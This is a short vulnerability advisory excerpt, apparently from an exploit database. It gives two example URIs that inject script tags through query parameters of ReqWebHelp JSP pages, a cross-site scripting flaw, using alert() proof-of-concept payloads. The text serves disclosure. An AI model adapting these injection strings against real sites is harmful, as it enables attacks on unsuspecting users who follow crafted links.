7 lines
No EOL
616 B
Text
7 lines
No EOL
616 B
Text
Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.
|
|
|
|
The following example URIs are available:
|
|
|
|
http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=
|
|
|
|
http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script> |